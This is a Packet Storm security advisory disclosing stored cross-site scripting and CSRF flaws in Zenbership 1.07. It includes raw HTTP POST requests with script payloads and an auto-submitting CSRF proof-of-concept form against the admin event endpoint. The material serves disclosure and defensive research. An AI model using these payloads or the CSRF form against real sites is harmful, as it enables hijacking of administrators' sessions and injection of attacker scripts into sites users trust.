what you don't know can hurt you

Zenbership 107 Cross Site Request Forgery / Cross Site Scripting

Zenbership 107 Cross Site Request Forgery / Cross Site Scripting
Posted Oct 24, 2016
Authored by Meryem AKDOGAN, Besim

Zenbership version 1.07 suffers from cross site request forgery, and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | 69fe9da80e9da42dc0f66bf7e4a49e98

Zenbership 107 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
1. ADVISORY INFORMATION
========================================
Title: Zenbership (latest version) - Multiple Vulnerabilities
Application: Zenbership
Class: Sensitive Information disclosure
Versions Affected: <= latest version )
Vendor URL: https://www.zenbership.com/
Software URL: https://www.zenbership.com/Download
Bugs: CSRF / Persistent Cross Site Scripting
Date of found: 23.10.2016
Author: Besim


2.CREDIT
========================================
Those vulnerabilities was identified by Besim ALTINOK and Mrs. Meryem AKDOAAN


3. VERSIONS AFFECTED
========================================
<= latest version



4. TECHNICAL DETAILS & POC
========================================


PR1 - Stored Cross Site Scripting
========================================

1 ) Admin login admin panel
2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2)
3 ) Attacker enter xss payload to last name input
4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts)
5 ) Vulnerability Parameter and Payload : &last_name=<Script>alert('ExploitDB')</Script>

## HTTP Request ##

POST /zenbership/pp-functions/form_process.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; zen_0176e737b450bbd83f5fc1066=253782
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 153

- POST DATA

page=1
&session=zen_0176e737b450bbd83f5fc1066
&first_name=Besim
&last_name=<Script>alert('ExploitDB')</Script>
&email=exploit@yopmail.com


PR2 - CSRF
========================================

1 ) Attacker can add new event with xss payload (stored)
- File : admin/cp-functions/event-add.php

HTTP Request and CSRF PoC
=========================


## HTTP Request ##

POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://site_name/zenbership/admin/index.php?l=events
Content-Length: 1206
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44
Connection: close


- POST DATA


id=JFW996951
&ext=
&edit=0
&event[id]=JFW996951&event[status]=1
&event[name]=<Script>alert('Meryem-ExploitDB');</Script>
&event[tagline]=Meryem&event[description]=<p>Meryem AKDOGAN</p>
&event[post_rsvp_message]=<p>Meryem AKDOGAN</p>
&event[calendar_id]=1
&event[custom_template]=
&tags=
&event[starts]=2016-10-26 00:00:00
&event[ends]=2016-10-28 00:00:00
&event[start_registrations]=2016-10-24 00:00:00
&event[close_registration]=&event[early_bird_end]=
&event[online]=0&event[location_name]=Turkey
&event[url]=&event[address_line_1]=
&event[address_line_2]=&event[city]=
&event[state]=&event[zip]=
&event[country]=
&event[phone]=
&limit_attendees_dud=0
&event[max_rsvps]=
&event[members_only_view]=0
&event[members_only_rsvp]=0
&event[allow_guests]=1
&event[max_guests]=1
&form[col2][Account Overview]=section
&form[col2][company_name]=1
&form[col2][address_line_1]=0
&form[col2][address_line_2]=0
&form[col2][city]=0
&form[col2][state]=0
&form[col2][zip]=0
&form[col2][country]=0
&form[col2][url]=0



## CSRF PoC ##

<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/admin/cp-functions/event-add.php" method="POST">
<input type="hidden" name="id" value="OXH978786" />
<input type="hidden" name="ext" value="" />
<input type="hidden" name="edit" value="0" />
<input type="hidden" name="event[id]" value="OXH978786" />
<input type="hidden" name="event[status]" value="1" />
<input type="hidden" name="event[name]" value="<script>alert('Meryem-ExploitDB');</Script>" />
<input type="hidden" name="event[tagline]" value="meryem" />
<input type="hidden" name="event[description]" value="<p>Meryem AKDOGAN</p>
" />
<input type="hidden" name="event[post_rsvp_message]" value="<p>Meryem AKDOGAN</p>
" />
<input type="hidden" name="event[calendar_id]" value="1" />
<input type="hidden" name="event[custom_template]" value="" />
<input type="hidden" name="tags" value="meryem" />
<input type="hidden" name="event[starts]" value="2016-10-26 00:00:00" />
<input type="hidden" name="event[ends]" value="2016-10-28 00:00:00" />
<input type="hidden" name="event[start_registrations]" value="2016-10-24 00:00:00" />
<input type="hidden" name="event[close_registration]" value="" />
<input type="hidden" name="event[early_bird_end]" value="" />
<input type="hidden" name="event[online]" value="0" />
<input type="hidden" name="event[location_name]" value="Turkey" />
<input type="hidden" name="event[url]" value="" />
<input type="hidden" name="event[address_line_1]" value="" />
<input type="hidden" name="event[address_line_2]" value="" />
<input type="hidden" name="event[city]" value="" />
<input type="hidden" name="event[state]" value="" />
<input type="hidden" name="event[zip]" value="" />
<input type="hidden" name="event[country]" value="" />
<input type="hidden" name="event[phone]" value="" />
<input type="hidden" name="limit_attendees_dud" value="0" />
<input type="hidden" name="event[max_rsvps]" value="" />
<input type="hidden" name="event[members_only_view]" value="0" />
<input type="hidden" name="event[members_only_rsvp]" value="0" />
<input type="hidden" name="event[allow_guests]" value="1" />
<input type="hidden" name="event[max_guests]" value="1" />
<input type="hidden" name="form[col2][Account Overview]" value="section" />
<input type="hidden" name="form[col2][company_name]" value="1" />
<input type="hidden" name="form[col2][address_line_1]" value="0" />
<input type="hidden" name="form[col2][address_line_2]" value="0" />
<input type="hidden" name="form[col2][city]" value="0" />
<input type="hidden" name="form[col2][state]" value="0" />
<input type="hidden" name="form[col2][zip]" value="0" />
<input type="hidden" name="form[col2][country]" value="0" />
<input type="hidden" name="form[col2][url]" value="0" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    13 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close